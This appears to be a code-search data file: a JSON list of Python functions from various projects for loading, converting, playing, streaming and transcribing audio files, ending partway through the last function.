[ "def process_audio_file(self, file_name):\n sig, sr = librosa.load(file_name, mono=True)\n return self._extract_function(sig, sr)", "def read_audio(f, downmix):\n if f.endswith('.mp3'):\n f = _mp3_hook(f)\n sr, audio = scipy.io.wavfile.read(f)\n if not audio.dtype is np.float32:\n audio = _normalize_pcm(audio)\n if downmix and len(audio.shape) == 2:\n audio = down_mix(audio)\n return sr, audio", "def audioRead(path):\n data, samplerate = sf.read(path)\n frames = data.shape[0]\n channels = len(data.shape)\n duration = 1/samplerate*frames\n return data, samplerate, path, duration, frames, channels", "def read_sound(self, inFile):\n\n # Python can natively only read \"wav\" files. To be flexible, use \"ffmpeg\" for conversion for other formats\n if not os.path.exists(inFile):\n print('{0} does not exist!'.format(inFile))\n raise FileNotFoundError\n \n (root, ext) = os.path.splitext(inFile)\n if ext[1:].lower() != 'wav':\n if self.ffmpeg_info.ffmpeg == None:\n print('Sorry, need FFMPEG for non-WAV files!')\n self.rate = None\n self.data = None\n raise NoFFMPEG_Error\n \n outFile = root + '.wav'\n cmd = [self.ffmpeg_info.ffmpeg, '-i', inFile, outFile, '-y']\n subprocess.run(cmd)\n print('Infile converted from ' + ext + ' to \".wav\"')\n \n inFile = outFile\n self.source = outFile\n\n self.rate, self.data = read(inFile)\n \n # Set the filename\n self.source = inFile\n \n # Make sure that the data are in some integer format\n # Otherwise, e.g. Windows has difficulty playing the sound\n # Note that \"self.source\" is set to \"None\", in order to\n # play the correct, converted file with \"play\"\n if not np.issubdtype(self.data.dtype, np.integer):\n self.generate_sound(self.data, self.rate)\n \n self._setInfo()\n print('data read in!')", "def readAudioFile(path):\n\n extension = os.path.splitext(path)[1]\n\n try:\n # Commented below, as we don't need this\n # #if extension.lower() == '.wav':\n # #[Fs, x] = wavfile.read(path)\n # if extension.lower() == '.aif' or extension.lower() == '.aiff':\n # s = aifc.open(path, 'r')\n # nframes = s.getnframes()\n # strsig = s.readframes(nframes)\n # x = numpy.fromstring(strsig, numpy.short).byteswap()\n # Fs = s.getframerate()\n if extension.lower() == '.mp3' or extension.lower() == '.wav' or extension.lower() == '.au' or extension.lower() == '.ogg':\n try:\n audiofile = AudioSegment.from_file(path)\n except:\n print(\"Error: file not found or other I/O error. \"\n \"(DECODING FAILED)\")\n return -1 ,-1\n\n if audiofile.sample_width == 2:\n data = numpy.fromstring(audiofile._data, numpy.int16)\n elif audiofile.sample_width == 4:\n data = numpy.fromstring(audiofile._data, numpy.int32)\n else:\n return -1, -1\n Fs = audiofile.frame_rate\n x = numpy.array(data[0::audiofile.channels]).T\n else:\n print(\"Error in readAudioFile(): Unknown file type!\")\n return -1, -1\n except IOError:\n print(\"Error: file not found or other I/O error.\")\n return -1, -1\n\n if x.ndim == 2:\n if x.shape[1] == 2:\n x = x.flatten()\n\n return Fs, x", "def read_audio(filename, sample_rate = 44100):\n loader = essentia.standard.MonoLoader(filename = filename, sampleRate = sample_rate)\n audio = loader()\n return audio", "def process_sound_file(file_path):\n\n return to_mfcc(get_wav(file_path))", "def get_audio():\n\tbuf = None\n\tnum_new_bytes = BUFFER_SIZE // REFRESH_BUFFER_FACTOR\n\twith open(INFILE) as fifo:\n\t\twhile True:\n\t\t\tif buf is None:\n\t\t\t\tbuf = fifo.read(BUFFER_SIZE)\n\t\t\telse:\n\t\t\t\tbuf = buf[num_new_bytes:] + fifo.read(num_new_bytes)\n\t\t\tyield buf", "def audio(self):\n self.log_string += 'Audio file'\n self._media_processing()", "def process_audio(fname, output_dir, poller):\n result = []\n try:\n if poller.params.candidate_transcripts is not None:\n out_path = \"{}/{}{}\".format(output_dir, os.path.splitext(os.path.basename(fname))[0], \".json\")\n else:\n out_path = \"{}/{}{}\".format(output_dir, os.path.splitext(os.path.basename(fname))[0], \".txt\")\n audio, audio_length = load_audio(fname, poller.params.model.sampleRate())\n pred = transcribe_audio(poller.params.model, audio, candidate_transcripts=poller.params.candidate_transcripts)\n with open(out_path, \"w\") as fp:\n fp.write(pred)\n result.append(out_path)\n except KeyboardInterrupt:\n poller.keyboard_interrupt()\n except:\n poller.error(\"Failed to process audio file: %s\\n%s\" % (fname, traceback.format_exc()))\n return result", "def wavread(filename):\n\n\tif (os.path.isfile(filename) == False): # raise error if wrong input file\n\t\traise ValueError(\"Input file is wrong\")\n\n\tfs, x = read(filename)\n\n\tif (len(x.shape) !=1): # raise error if more than one channel\n x = np.mean(x,axis = 1)\n\t\tprint \"Audio file is stereo, converting to mono\"\n\n\t#scale down and convert audio into floating point number in range of -1 to 1\n\tx = np.float32(x)/norm_fact[x.dtype.name]\n\treturn fs, x", "def play_audio_file(self, fname=DETECT_DONG):\n ding_wav = wave.open(fname, 'rb')\n ding_data = ding_wav.readframes(ding_wav.getnframes())\n # with no_alsa_error():\n audio = pyaudio.PyAudio()\n stream_out = audio.open(\n format=audio.get_format_from_width(ding_wav.getsampwidth()),\n channels=ding_wav.getnchannels(),\n rate=ding_wav.getframerate(), input=False, output=True)\n stream_out.start_stream()\n stream_out.write(ding_data)\n time.sleep(0.2)\n stream_out.stop_stream()\n stream_out.close()\n audio.terminate()", "def load_and_process_audio(self):\n output_vector = None\n doa = None\n if self.model == \"gcc_cnn\":\n output_vector, doa = self.format_gcc_cnn()\n elif self.model == \"gcc_dsp\":\n output_vector, doa = self.format_gcc_dsp()\n elif self.model == \"raw_cnn\":\n output_vector, doa = self.format_raw_audio_cnn()\n elif self.model == \"raw_resnet\":\n output_vector, doa = self.format_raw_audio_cnn()\n else:\n print(\"Error -> No file found\")\n\n return output_vector, doa", "def receive_audio(self):\n print(\"got to receive audio\")\n self.receive_audio_socket = self.start_socket(IP, RECEIVE_AUDIO_PORT)\n self.send_chunk(self.my_name.encode(), self.receive_audio_socket)\n print(self.receive_mes(self.receive_audio_socket))\n\n print(\"receive stream made\")\n i = 0\n done = False\n while not done:\n try:\n i += 1\n data = self.receive_audio_socket.recv(CHUNK) # gets audio chunk\n #print(\"got audio chunk number {} of length {}\".format(i, len(data)))\n self.lock.acquire()\n self.voice_stream.write(data) # plays\n self.lock.release()\n # if len(data) == 0:\n # done = True\n #print(\"wrote chunk #{}\".format(i))\n except socket.error as msg:\n print(\"socket failure receive audio: {}\".format(msg))\n done = True\n except KeyboardInterrupt:\n print(\"exception receive audio\")\n done = True\n self.receive_audio_socket.close()\n # stream_receive.close()\n # p_receive.terminate()", "def run(self):\r\n\r\n p = pyaudio.PyAudio()\r\n\r\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\r\n channels=wf.getnchannels(),\r\n rate=wf.getframerate(),\r\n output=True)\r\n\r\n musicdata = wf.readframes(CHUNK)\r\n\r\n while playing:\r\n if self.streamnum == 1:\r\n stream.write(musicdata)\r\n musicdata = wf.readframes(CHUNK)\r\n else:\r\n stream.write(musicdata)\r\n musicdata = wf2.readframes(CHUNK)\r\n if len(musicdata) < CHUNK or musicdata == '':\r\n if self.streamnum == 1:\r\n self.streamnum = 2\r\n else:\r\n self.streamnum = 1\r\n self.next = False\r\n if self.pause:\r\n while True:\r\n if not playing:\r\n return\r\n elif not self.pause:\r\n break\r\n\r\n stream.stop_stream()\r\n stream.close()\r\n\r\n p.terminate()", "def play(self, context=None):\n\n self.nowPlaying = True\n\n # Open file for reading\n wf = wave.open(self.path + '/' + self.name, 'rb')\n p = pyaudio.PyAudio()\n\n # Open stream for playback\n stream = p.open( format = p.get_format_from_width( wf.getsampwidth() ),\n channels = wf.getnchannels(),\n rate = wf.getframerate(), output = True)\n\n # Read file in chunks of 1024 bytes\n data = wf.readframes(1024)\n\n # Read while there is data left to read\n # If nowPlaying is False, user has clicked Stop\n while data != '' and self.nowPlaying:\n stream.write(data)\n data = wf.readframes(1024)\n\n stream.stop_stream()\n stream.close()\n\n p.terminate()\n\n self.nowPlaying = False\n\n # Callback to UI to signal that audio has finished playing\n if context is not None:\n context.stopAudio()", "def load_audio(self):\n df = pd.read_csv(\"{dir}/iteration_{iter}.csv\".format(dir=self.directory, iter=self.iteration),\n usecols=[1, 2, 3])\n\n doa_from_file = df.iloc[0][1]\n wav_name = df.iloc[0][0]\n filename = \"{dir}/{wav_name}\".format(dir=self.directory, wav_name=wav_name)\n\n y, sr = librosa.load(filename, mono=False)\n\n y_8k = librosa.resample(y, sr, 8000)\n result_x = librosa.util.fix_length(y_8k, 8000)\n\n return result_x, doa_from_file", "def play_audio(filename):\n chunk = 1024\n wf = wave.open(filename, 'rb')\n pa = pyaudio.PyAudio()\n stream = pa.open(\n format=pa.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True\n )\n data_stream = wf.readframes(chunk)\n while data_stream:\n stream.write(data_stream)\n data_stream = wf.readframes(chunk)\n stream.close()\n pa.terminate()", "def read_audio(file_path, resample_rate=None, to_mono=False):\n return librosa.load(file_path, sr=resample_rate, mono=to_mono)", "def play_audio(file: str) -> None:\n pygame.mixer.init()\n pygame.mixer.music.load(file)\n pygame.mixer.music.play()\n\n while pygame.mixer.music.get_busy():\n continue", "def play(self):\n\n try:\n if self.source is None:\n # If there is no source-file, write the data to a temporary WAV-file ...\n tmpFile = tempfile.NamedTemporaryFile(suffix='.wav', delete=False)\n tmpFile.close()\n self.write_wav(tmpFile.name)\n \n # ... and play that file\n if sys.platform=='win32':\n winsound.PlaySound(tmpFile.name, winsound.SND_FILENAME)\n elif sys.platform == 'darwin':\n cmd = ['afplay', tmpFile.name]\n subprocess.run(cmd)\n else:\n pygame.init()\n pygame.mixer.music.load(tmpFile.name)\n pygame.mixer.music.play()\n time.sleep(self.duration)\n \n # If you want to use FFMPEG instead, use the following commands:\n #cmd = [self.ffmpeg_info.ffplay, '-autoexit', '-nodisp', '-i', tmpFile.name]\n #subprocess.run(cmd)\n \n elif os.path.exists(self.source):\n # If you have a given input file ...\n print('Playing ' + self.source)\n \n # ... then play that one\n if sys.platform == 'win32':\n winsound.PlaySound(str(self.source), winsound.SND_FILENAME)\n elif sys.platform == 'darwin':\n cmd = ['afplay', str(self.source)]\n subprocess.run(cmd)\n else:\n pygame.init()\n pygame.mixer.music.load(self.source)\n pygame.mixer.music.play()\n time.sleep(self.duration)\n \n # If you want to use FFMPEG instead, use the following commands:\n #cmd = [self.ffmpeg_info.ffplay, '-autoexit', '-nodisp', '-i', self.source]\n #subprocess.run(cmd)\n \n except SystemError:\n print('If you don''t have FFMPEG available, you can e.g. use installed audio-files. E.g.:')\n print('import subprocess')\n print('subprocess.run([r\"C:\\Program Files (x86)\\VideoLAN\\VLC\\vlc.exe\", r\"C:\\Music\\14_Streets_of_Philadelphia.mp3\"])')", "def read_audio(self, path_to_wav):\n y, sr = librosa.load(path_to_wav, sr=None)\n return (y, sr)", "def process_files(audio_files, context=[]):\n\n results = []\n bar_limit = len(audio_files)\n client = speech.SpeechClient()\n with Bar('Processing:', max=bar_limit) as bar:\n for audio in audio_files:\n response = convert_speech_to_text(client, audio, context)\n (transcription, confidence) = transcript(response)\n results.append({\n \"path\": audio,\n \"transcription\": transcription,\n \"confidence\": confidence\n })\n bar.next()\n return results", "def inputwav(filename):\n data, sr = sf.read(filename)\n print('Decoding \"'+filename+'\"...')\n print('Sample rate is '+str(sr)+'...')\n try:\n ch=len(data[0,])\n except:\n ch=1\n print('File contains '+str(ch)+' audio channel(s)...')\n #Reshape the data so other functions can interpret the array if mono.\n #basically transposing the data\n if ch==1:\n data=data.reshape(-1,1)\n n=len(data)\n #This prevents log(data) producing nan when data is 0\n data[np.where(data==0)]=0.00001\n #convert to dB\n data_dB=20*np.log10(abs(data))\n return n, data,data_dB,sr, ch", "def loadAudio(self,path):\r\n if self.vid:# Release video to access\r\n self.vid.release()\r\n # Check if has audio\r\n mixer.music.unload()\r\n command = \"ffprobe -i \\\"{0}\\\" -show_streams -select_streams a -loglevel error\".format(path)\r\n result = run(command,stdout=PIPE,stderr=PIPE,universal_newlines=True,shell=True)\r\n if result.stdout.startswith(\"[STREAM]\"):# Contains audio\r\n self.hasAudio = True\r\n else:\r\n self.hasAudio = False\r\n return\r\n print(\"Preparing Audio...\",end=\"\")\r\n filename = \"project_audio.mp3\"\r\n self.aud_path = filename\r\n t_start = time.time()\r\n # Extract audio using ffmpeg, always overwrite\r\n command = \"ffmpeg -y -i \\\"{0}\\\" \\\"{1}\\\"\".format(path,filename)\r\n result = run(command,stdout=PIPE,stderr=PIPE,universal_newlines=True,shell=True)\r\n## print(result.stderr)\r\n t_end = time.time()\r\n print(\"Done[{0}]\".format(int(t_end-t_start)))\r\n try:\r\n mixer.music.unload()\r\n mixer.music.load(filename)\r\n except:\r\n print(\"Error Loading Audio\")\r\n self.hasAudio = False\r\n self.vid = cv2.VideoCapture(self.vid_path)# Reload video component\r\n # Launch in GUI Thread\r", "def readAudioData(self, shouldProcess):\n if shouldProcess:\n return gatherData(self.playlists) \n else:\n return pd.read_pickle(\"data/audioDF.pkl\")", "def read_process_song(path, window=1, overlap=0, debug=True):\n\n arr_features = []\n\n signal, sr = librosa.load(path)\n signal = signal[:660000]\n\n # Debug process\n if debug:\n print(\"Reading file: {}\".format(path))\n\n # Split songs:\n samples = split_songs(signal, window, overlap)\n\n # Append the result to the data structure\n for s in samples:\n features = get_features(s, sr)\n arr_features.append(features)\n return arr_features", "def process_file(self, file_name):\n logger.info(f'Recognising speech for {file_name}')\n wf = wave.open(file_name, \"rb\")\n # Check to see if the audio file can be read by the Vosk model\n if wf.getnchannels() != 1 or wf.getsampwidth() != 2 or wf.getcomptype() != \"NONE\":\n raise Exception(f'Invalid file format for {file_name}')\n rec = KaldiRecognizer(self.model, wf.getframerate())\n results = []\n while True:\n data = wf.readframes(config.frame_to_read)\n # If the data we have read is empty then we are at the end of the file\n if len(data) == 0:\n break\n if rec.AcceptWaveform(data):\n result = json.loads(rec.Result())\n # Result can contain an empty text string but no result list\n if len(result['text']) > 0:\n # If we reach here we have accepted the translation of a section of text\n results.extend(result['result'])\n result = json.loads(rec.FinalResult())\n # Add to results list\n if len(result['text']) > 0:\n results.extend(result['result'])\n logger.info(f'Processed speech, captured {len(results)} results')\n return results", "def handle_audio_input(message):\n def build_context(msg: Message):\n ctx = {'client_name': 'mycroft_listener',\n 'source': msg.context.get(\"source\" or \"speech_api\"),\n 'destination': [\"skills\"],\n \"audio_parser_data\": msg.context.get(\"audio_parser_data\"),\n \"client\": msg.context.get(\"client\"), # origin (local, klat, nano, mobile, api)\n \"neon_should_respond\": msg.context.get(\"neon_should_respond\"),\n \"username\": msg.context.get(\"username\"),\n \"timing\": {\"start\": msg.data.get(\"time\"),\n \"transcribed\": time.time()},\n \"ident\": msg.context.get(\"ident\", time.time())\n }\n if msg.context.get(\"klat_data\"):\n ctx[\"klat_data\"] = msg.context(\"klat_data\")\n ctx[\"nick_profiles\"] = msg.context.get(\"nick_profiles\")\n return ctx\n\n ident = message.context.get(\"ident\") or \"neon.audio_input.response\"\n wav_file_path = message.data.get(\"audio_file\")\n lang = message.data.get(\"lang\")\n try:\n _, parser_data, transcriptions = _get_stt_from_file(wav_file_path, lang)\n message.context[\"audio_parser_data\"] = parser_data\n context = build_context(message)\n data = {\n \"utterances\": transcriptions,\n \"lang\": message.data.get(\"lang\", \"en-us\")\n }\n handled = _emit_utterance_to_skills(Message('recognizer_loop:utterance', data, context))\n bus.emit(message.reply(ident, data={\"parser_data\": parser_data,\n \"transcripts\": transcriptions,\n \"skills_recv\": handled}))\n except Exception as e:\n LOG.error(e)\n bus.emit(message.reply(ident, data={\"error\": repr(e)}))", "def load_audio(file_path):\n # load the audio file in its original sampling rate\n audio_data, sr = librosa.load(file_path, sr=sampling_rate)\n\n # get the common file name\n file_name = file_path.split(\"/\")[-1]\n file_name = file_name.split(\".wav\")[0]\n\n # calculate number of samples in the time duration needed\n num_samples = int(sr*time_duration)\n\n # get the cut-off audio signals and save them\n for i in np.arange(num_audio_files):\n audio_cut_data = cut_sample(audio_data, num_samples)\n file_path=dir_to_save + file_name + \"_\" + str(i+1) + \".wav\"\n save_sample(audio_cut_data, file_path, sr)\n print(f\"generating signal {str(i)}, its length {len(audio_cut_data)} by cutting the original signal\")", "def read_audiofile(audio_name,cutToLength):\n fs, data = wavfile.read(audio_name)\n # sa.play_buffer(audio_data, num_channels, bydeftes_per_sample,sample_rate)\n #play_obj = sa.play_buffer(data,1,2,fs)\n #play_obj.stop()\n # delete one column. Make mono channel\n if data.shape[1]>1:\n data = numpy.delete(data,1,1)\n #downsample if signal is broad\n if fs>24000:\n data = numpy.delete(data, numpy.s_[::2], 0)\n fs = int(fs/2)\n \n data = data[data!=0]\n data = numpy.delete(data,numpy.s_[ int(cutToLength*fs):len(data)] )\n return data", "def play_audio():\n directory = os.fsencode(MINI_PATH)\n print(directory)\n adp= []\n # lst = os.listdir(directory)\n # lst.sort()\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n #print(file)\n\n if filename.endswith(\".mp3\"): \n adp.append(MINI_PATH+filename)\n #print(adp)\n adp.sort()\n print(\"ADP: \", adp)\n x = \"|\".join(adp)\n print( f'concat:{x}')\n subprocess.call(['ffmpeg', '-i', f'concat:{x}', '-acodec', 'copy', RESULT_PATH])\n \n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n print(filename)\n if filename.endswith(\".mp3\"):\n os.remove(MINI_PATH+filename)", "def readFile(filename):\r\n speechFile = open(filename, \"r\")\r\n speech = speechFile.read()\r\n speechFile.close()\r\n return speech", "def process_audio_multiprocess(file_paths_arr,\n filt_type, filt_cutoff_freq, filt_order,\n trim_margin_left, trim_margin_right, trim_top_db, trim_window_length, trim_hop_length, trim_ref, trim_preemphasis_strength,\n SAMPLE_RATE=48000, MIN_SAMPLE_RATE=15999, BIT_DEPTH=2,\n ignore_dirs=[\"Noise samples\",\"_Noisy_\",\"_Very Noisy_\"], skip_existing=False,\n in_ext_=None, out_ext=\".wav\", use_tqdm=True, dump_sample_rates=True\n ):\n import soundfile as sf\n import scipy\n from scipy import signal\n \n if dump_sample_rates:\n sample_rates = {} # array of dicts. e.g: [{path 0: sample_rate 0}, {path 1: sample_rate 1}, {path 2: sample_rate 2}, ...]\n \n skip = 0\n prev_sr = 0\n iterator = tqdm(file_paths_arr, smoothing=0.0) if use_tqdm else file_paths_arr\n for file_path in iterator: # recursive directory search\n in_ext = in_ext_ if (in_ext_ is not None) else os.path.splitext(os.path.split(file_path)[-1])[-1] # get ext from file_path or use override.\n out_path = file_path.replace(in_ext,out_ext)\n if skip_existing and os.path.exists(out_path):\n continue\n if any([filter_dir in file_path for filter_dir in ignore_dirs]):\n continue\n \n # VCTK cleanup\n #if file_path.endswith(f\"_mic1{in_ext}\"):\n # os.rename(file_path, file_path.replace(f\"_mic1{in_ext}\",in_ext))\n #if file_path.endswith(f\"_mic2{in_ext}\"):\n # continue\n try:\n native_sound, native_SR = sf.read(file_path, always_2d=True)\n except RuntimeError as ex:\n print(f'\"{os.path.split(file_path)[-1]}\" failed to load and has been deleted.\\nDELETED PATH: \"{file_path}\"')\n os.unlink(file_path)\n #raise RuntimeError(ex)\n native_sound = native_sound[:,0]# take first channel (either mono or left audio channel)\n native_sound = np.asfortranarray(native_sound).astype('float64') # and ensure the audio is contiguous\n \n if native_SR < MIN_SAMPLE_RATE: # skip any files with native_SR below the minimum\n continue\n if native_SR != SAMPLE_RATE: # ensure all audio is same Sample Rate\n try:\n sound = librosa.core.resample(native_sound, native_SR, SAMPLE_RATE)\n except ValueError as ex:\n print(ex, file_path, native_SR, len(native_sound), sep=\"\\n\")\n raise ValueError(ex)\n else:\n sound = native_sound\n \n if dump_sample_rates:\n sample_rates[os.path.abspath(out_path)] = native_SR\n \n # 24 bit -> 16 bit, 32 bit -> 16 bit\n if max(np.amax(native_sound), -np.amin(native_sound)) > (2**23): # if samples exceed values possible at 24 bit\n sound = (sound / 2**(31-15))#.astype('int16') # change bit depth from 32 bit to 16 bit\n elif max(np.amax(native_sound), -np.amin(native_sound)) > (2**15): # if samples exceed values possible at 16 bit\n sound = (sound / 2**(23-15))#.astype('int16') # change bit depth from 24 bit to 16 bit\n \n # apply audio filters\n for type_, freq_, order_ in zip(filt_type, filt_cutoff_freq, filt_order): # eg[ ['lp'], [40], [10] ] # i.e [type, freq, strength]\n sos = signal.butter(order_, freq_, type_, fs=SAMPLE_RATE, output='sos') # calcuate filter somethings\n sound = signal.sosfilt(sos, sound) # apply filter\n \n # apply audio trimming\n for i, (margin_left_, margin_right_, top_db_, window_length_, hop_length_, ref_, preemphasis_strength_) in enumerate(zip(trim_margin_left, trim_margin_right, trim_top_db, trim_window_length, trim_hop_length, trim_ref, trim_preemphasis_strength)):\n if preemphasis_strength_:\n sound_filt = librosa.effects.preemphasis(sound, coef=preemphasis_strength_)\n _, index = librosa.effects.trim(sound_filt, top_db=top_db_, frame_length=window_length_, hop_length=hop_length_, ref=ref_) # gonna be a little messed up for different sampling rates\n else:\n _, index = librosa.effects.trim(sound, top_db=top_db_, frame_length=window_length_, hop_length=hop_length_, ref=ref_) # gonna be a little messed up for different sampling rates\n try:\n sound = sound[int(max(index[0]-margin_left_, 0)):int(index[1]+margin_right_)]\n except TypeError:\n print(f'Slice Left:\\n{max(index[0]-margin_left_, 0)}\\nSlice Right:\\n{index[1]+margin_right_}')\n assert len(sound), f\"Audio trimmed to 0 length by pass {i+1}\\nconfig = {[margin_left_, margin_right_, top_db_, window_length_, hop_length_, ref_]}\\nFile_Path = '{file_path}'\"\n \n # write updated audio to file\n if os.path.exists(out_path):\n os.unlink(out_path) # using unlink incase the out_path object is a symlink\n sf.write(out_path, sound, SAMPLE_RATE)\n \n if dump_sample_rates:\n return sample_rates", "def load_audio(path):\r\n if path[-4:] == \".wav\":\r\n fs, data = load_wav(path)\r\n\r\n elif path[-4:] == \".mp3\":\r\n fs, data = load_mp3(path)\r\n\r\n else:\r\n raise ValueError(\"Wrong file format, use mp3 or wav\")\r\n\r\n return fs, data", "def stream_file(filename):\n wf = wave.open(filename, 'rb')\n # read in ~100ms chunks\n chunk = int(wf.getframerate() / 10)\n data = wf.readframes(chunk)\n while True:\n try:\n while connected:\n if data != '' and len(data) != 0:\n sio.emit('data', data)\n # sleep for the duration of the audio chunk\n # to mimic real time playback\n sio.sleep(0.1)\n data = wf.readframes(chunk)\n else:\n print('EOF, pausing')\n sio.sleep(0.5)\n wf = wave.open(filename, 'rb')\n data = wf.readframes(chunk)\n print('restarting playback')\n sio.sleep(0.2)\n except socketio.exceptions.ConnectionError as err:\n print('Connection error: %s! Retrying at %s' %\n (err, datetime.utcnow()))\n except KeyboardInterrupt:\n return", "def load_audio(path, target_fs=None):\n y, fs = sf.read(path)\n if y.ndim>1:\n y = np.mean(y, axis=1)\n if target_fs is not None and fs!=target_fs:\n #print('Resampling %d->%d...' %(fs, target_fs))\n y = librosa.resample(y, orig_sr=fs, target_sr=target_fs)\n fs = target_fs\n return y, fs", "def recorder():\n # Following block gets rid of annoying config errors by ALSA\n def py_error_handler(filename, line, function, err, fmt):\n pass\n ERROR_HANDLER_FUNC = CFUNCTYPE(None, c_char_p, c_int, c_char_p, c_int, c_char_p)\n c_error_handler = ERROR_HANDLER_FUNC(py_error_handler)\n asound = cdll.LoadLibrary('libasound.so')\n asound.snd_lib_error_set_handler(c_error_handler) \n\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=1, rate=RATE,\n input=True, output=True,\n frames_per_buffer=CHUNK_SIZE)\n\n yield stream\n\n stream.stop_stream()\n stream.close()\n p.terminate()", "def analyzeWAV(inputFile):\n data, fs, nbits = audiolab.wavread(inputFile)\n samplingRate = fs\n return [data, samplingRate]", "def load_music_files():\n # Make a list of music files, right now it is done by collection all files\n # below the current folder whose extension starts with mp3/wav \n print('Loading music files...')\n for path, dirs, files in os.walk('.'):\n for file_ in files:\n file_path = os.path.relpath(os.path.join(path, file_))\n url_path = os.path.join(*[quote(part) for part in os.path.split(file_path)]) \n ext = os.path.splitext(file_)[1].lower()\n name = os.path.splitext(file_)[0].lower()\n key = ''.join(name.split()) # unique key - no spaces\n audio_file = None\n if ext.startswith('.mp3'):\n audio = MP3(file_path) \n audio_file = AudioFile(url_path, audio.info.length, name, key) \n if audio_file:\n music_files.append(audio_file)\n print('Found:', music_files[-1])", "def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:\n audio, sr = librosa.load(fhandle, sr=22050, mono=True)\n return audio, sr", "async def play(self, ctx, *, filename: str):\r\n if not ctx.voice_client:\r\n await self.connect(ctx)\r\n if filename not in self.audio_files:\r\n await ctx.send(\"File {0} not found\".format(filename))\r\n await self.audiofiles(ctx)\r\n else:\r\n ctx.voice_client.play(discord.FFmpegPCMAudio(source=\"{0}{1}.mp3\".format(self.audio_base_dir, filename)))\r\n await ctx.message.delete()", "def test_process_mono_file(self):\n test_path = pathlib.Path(__file__).parent.absolute() / 'data/mono.wav'\n self.default_kwargs['input_file'] = test_path\n self.default_kwargs['output_file'] = pathlib.Path(self.temp_file.name)\n self.encoder = FileEncoder(**self.default_kwargs)\n self.encoder.process()", "def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:\n return librosa.load(fhandle, sr=44100, mono=True)", "def read(self, path, size, offset, fh, *args, **pargs):\n with self.rwlock:\n if(path in self._open_subtracks):\n real = False\n # Update the last accessed time.\n self._open_subtracks[path]['Last Access'] = time.time()\n # Store the requested offset.\n self._open_subtracks[path]['Positions'][fh] = offset\n else:\n real = True\n if(real):\n # For all non-FLACCue files, just access it normally.\n os.lseek(fh, offset, 0)\n return os.read(fh, size)\n # Wait for the file to finish opening.\n while(True):\n with(self.rwlock):\n self._open_subtracks[path]['Last Access'] = time.time()\n if(self._open_subtracks[path]['Audio'] is not None):\n audio = self._open_subtracks[path]['Audio']\n break\n time.sleep(0.1)\n # Return the data requested.\n if(offset > len(audio)):\n # If we're looking near the end of the file,\n # handle the fact that compression could change the size.\n reported_size = self.getattr(path)['st_size']\n if(offset < reported_size):\n offset = len(audio) - (reported_size - offset)\n return audio[offset:offset+size].tobytes()", "def read( self, song_file_name ):\n song_file = open( song_file_name )\n content = song_file.read()\n return self.split( content )", "def read_audio(ws):\n # Open stream\n global RATE\n p = pyaudio.PyAudio()\n RATE = int(p.get_default_input_device_info()['defaultSampleRate'])\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\n # Recognize until timeout or recognition\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n if not RUNNING:\n break\n data = stream.read(CHUNK)\n ws.send(data, ABNF.OPCODE_BINARY)\n\n print(\"Stopped listening\")\n # Disconnect the audio stream\n stream.stop_stream()\n stream.close()\n # Close the WebSocket\n ws.close()\n # Kill the audio device\n p.terminate()", "def read_write_audio(self):\n\n if (self.local_audio_play and\n (self.mem_player.get_write_available() > self.cfg['Audio']['samples_per_frame'] * 2)):\n # send a frame from input to be played\n data_play = self.local_audio_play.popleft()\n\n if self.audio_playing and isinstance(data_play, Frame):\n if len(data_play) == self.cfg['Audio']['samples_per_frame'] * 2:\n self.last_frame_id = self.mem_player.put_frame(data_play.payload)\n self.cfg['Logging']['session_logger'].rec_write(self.audio_playing, data_play.payload)\n\n elif isinstance(data_play, Command):\n if data_play.parsed['__name__'] == 'utterance_start':\n self.audio_playing = data_play.parsed['fname']\n self.message_queue.append(\n (Command('play_utterance_start(user_id=\"{uid}\",fname=\"{fname}\")'\n .format(uid=data_play.parsed['user_id'], fname=data_play.parsed['fname']),\n 'VoipIO', 'HUB'),\n self.last_frame_id))\n try:\n if data_play.parsed['log'] == \"true\":\n self.cfg['Logging']['session_logger'].rec_start(\"system\", data_play.parsed['fname'])\n except SessionLoggerException as e:\n self.cfg['Logging']['system_logger'].exception(e)\n\n if self.audio_playing and data_play.parsed['__name__'] == 'utterance_end':\n self.audio_playing = None\n self.message_queue.append(\n (Command('play_utterance_end(user_id=\"{uid}\",fname=\"{fname})'\n .format(uid=data_play.parsed['user_id'], fname=data_play.parsed['fname']),\n 'VoipIO', 'HUB'),\n self.last_frame_id))\n try:\n if data_play.parsed['log'] == \"true\":\n self.cfg['Logging']['session_logger'].rec_end(data_play.parsed['fname'])\n except SessionLoggerException as e:\n self.cfg['Logging']['system_logger'].exception(e)\n\n if (self.mem_capture.get_read_available() > self.cfg['Audio']['samples_per_frame'] * 2):\n # Get and send recorded data, it must be read at the other end.\n data_rec = self.mem_capture.get_frame()\n\n # send the audio only if the call is connected\n # ignore any audio signal left after the call was disconnected\n if self.audio_recording:\n self.audio_record.send(Frame(data_rec))", "def direct_play(file_name,\n sample_rate = 44100,\n chunk = 1024,\n channel = 1,\n width = 2):\n \n data_file = open(file_name, 'rb', chunk)\n\n # PyAudio instance\n p = pyaudio.PyAudio()\n\n # Open stream\n stream = p.open(format = p.get_format_from_width(width),\n channels = channel,\n rate = sample_rate,\n output = True)\n\n data = data_file.read(chunk)\n\n # Playing the data\n while data != \"\":\n stream.write(data)\n data = data_file.read(chunk)\n\n # Ending things\n stream.stop_stream()\n stream.close()\n p.terminate()", "def load_audio_data(file_path, config):\n pure_path = pathlib.PurePath(file_path)\n audio_seg = pydub.AudioSegment.from_file(pure_path, pure_path.suffix[1:])\n if audio_seg.frame_rate != config.sample_rate_hertz:\n raise ValueError(\"Mismatch in sample rate: expected: %d; got: %d\" % (\n config.sample_rate_hertz, audio_seg.frame_rate))\n if audio_seg.channels != config.audio_channel_count:\n raise ValueError(\n \"Mismatch in audio channel count: expected: %d; got: %d\" % (\n config.audio_channel_count, audio_seg.channels))\n samples = list(audio_seg.get_array_of_samples())\n # NOTE(cais): We currently use LINEAR16 in the stream requests regardless of\n # the original audio file format. Is it possible to avoid converting FLAC to\n # LINEAR16 during these cloud requests?\n return struct.pack('<%dh' % len(samples), 